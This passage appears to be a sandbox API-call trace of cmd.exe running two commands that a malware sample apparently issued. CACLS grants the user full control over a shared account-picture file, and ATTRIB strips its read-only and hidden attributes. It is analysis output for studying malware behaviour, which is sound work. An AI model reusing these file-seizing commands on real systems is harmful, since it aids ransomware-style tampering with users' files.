hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x1, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x1, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x0, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x9, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x9, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x9, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.293] RegCloseKey (hKey=0x40) returned 0x0 [0189.293] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886397 [0189.293] srand (_Seed=0x5b886397) [0189.293] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"" [0189.293] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"" [0189.293] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.293] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0189.293] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.293] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.293] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.293] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0189.293] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0189.293] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0189.293] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0189.294] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0189.294] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0189.294] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0189.294] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0189.294] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0189.294] GetEnvironmentStringsW () returned 0x3a2458* [0189.294] FreeEnvironmentStringsW (penv=0x3a2458) returned 1 [0189.294] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.294] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.294] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0189.294] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0189.294] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0189.294] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0189.294] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0189.294] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0189.294] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0189.294] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0189.294] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af4e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.294] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af4e8, lpFilePart=0x1af4e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af4e4*="Desktop") returned 0x18 [0189.294] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.294] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af264 | out: lpFindFileData=0x1af264) returned 0x3a0ae8 [0189.294] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0189.295] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af264 | out: lpFindFileData=0x1af264) returned 0x3a0ae8 [0189.295] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0189.295] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af264 | out: lpFindFileData=0x1af264) returned 0x3a0ae8 [0189.295] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0189.295] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.295] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0189.295] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0189.295] GetEnvironmentStringsW () returned 0x3a0308* [0189.295] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0189.295] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.296] GetConsoleOutputCP () returned 0x1b5 [0189.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.296] GetUserDefaultLCID () returned 0x409 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af628, cchData=128 | out: lpLCData="0") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af628, cchData=128 | out: lpLCData="0") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af628, cchData=128 | out: lpLCData="1") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0189.296] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0189.297] GetConsoleTitleW (in: lpConsoleTitle=0x3909b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.297] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0189.297] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0189.298] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0189.298] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0189.299] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0189.299] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0189.299] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0189.299] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0189.299] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0189.299] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0189.299] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0189.336] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0189.336] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0189.336] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0189.336] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0189.336] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0189.336] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0189.336] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0189.338] GetConsoleTitleW (in: lpConsoleTitle=0x1af2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.339] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.339] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.339] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.339] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.339] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.339] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.339] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.339] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.339] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.339] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.339] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.339] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.339] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.339] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.339] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.339] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.339] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.339] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.339] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.339] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.339] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.339] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.339] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.339] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.339] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.339] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.339] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.339] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.339] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.339] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.340] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.340] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.340] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.340] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.340] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.340] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.340] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.340] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.340] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.340] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.340] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.340] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.340] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.340] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.340] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.340] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.340] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.340] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.340] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.340] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.340] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.340] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.340] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.340] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.340] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.340] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.340] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.340] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.340] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.340] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.340] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.340] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.340] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.340] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.340] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0189.340] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0189.340] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0189.341] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0189.341] SetErrorMode (uMode=0x0) returned 0x0 [0189.341] SetErrorMode (uMode=0x1) returned 0x0 [0189.341] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1e98, lpFilePart=0x1aeddc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1aeddc*="Desktop") returned 0x18 [0189.341] SetErrorMode (uMode=0x0) returned 0x1 [0189.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.341] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.346] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.347] GetLastError () returned 0x2 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.347] GetLastError () returned 0x2 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0x3a2180 [0189.347] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.347] GetLastError () returned 0x2 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0x3a2180 [0189.348] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0189.348] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.348] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.348] GetConsoleTitleW (in: lpConsoleTitle=0x1af050, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.348] InitializeProcThreadAttributeList (in: lpAttributeList=0x1aeed8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1aefa0 | out: lpAttributeList=0x1aeed8, lpSize=0x1aefa0) returned 1 [0189.348] UpdateProcThreadAttribute (in: lpAttributeList=0x1aeed8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1aef98, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1aeed8, lpPreviousValue=0x0) returned 1 [0189.348] GetStartupInfoW (in: lpStartupInfo=0x1aee94 | out: lpStartupInfo=0x1aee94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.348] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.349] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1aef34*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1aef80 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1aef80*(hProcess=0x50, hThread=0x4c, dwProcessId=0x88c, dwThreadId=0x9ac)) returned 1 [0189.351] CloseHandle (hObject=0x4c) returned 1 [0189.351] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.351] GetEnvironmentStringsW () returned 0x3a0308* [0189.351] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0189.351] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0189.515] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1aee74 | out: lpExitCode=0x1aee74*=0x0) returned 1 [0189.515] CloseHandle (hObject=0x50) returned 1 [0189.515] _vsnwprintf (in: _Buffer=0x1aefbc, _BufferCount=0x13, _Format="%08X", _ArgList=0x1aee80 | out: _Buffer="00000000") returned 8 [0189.515] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.515] GetEnvironmentStringsW () returned 0x3a2410* [0189.515] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.515] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.515] GetEnvironmentStringsW () returned 0x3a2410* [0189.515] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.516] DeleteProcThreadAttributeList (in: lpAttributeList=0x1aeed8 | out: lpAttributeList=0x1aeed8) [0189.516] GetConsoleTitleW (in: lpConsoleTitle=0x1af2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.516] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.516] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.516] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.516] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.516] GetLastError () returned 0x2 [0189.516] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.517] GetLastError () returned 0x2 [0189.517] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0x39e4d8 [0189.517] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0189.517] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.517] GetLastError () returned 0x2 [0189.517] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0x39e4d8 [0189.517] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0189.517] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.517] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.517] GetConsoleTitleW (in: lpConsoleTitle=0x1af050, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.517] InitializeProcThreadAttributeList (in: lpAttributeList=0x1aeed8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1aefa0 | out: lpAttributeList=0x1aeed8, lpSize=0x1aefa0) returned 1 [0189.517] UpdateProcThreadAttribute (in: lpAttributeList=0x1aeed8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1aef98, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1aeed8, lpPreviousValue=0x0) returned 1 [0189.517] GetStartupInfoW (in: lpStartupInfo=0x1aee94 | out: lpStartupInfo=0x1aee94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.517] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.518] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1aef34*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, 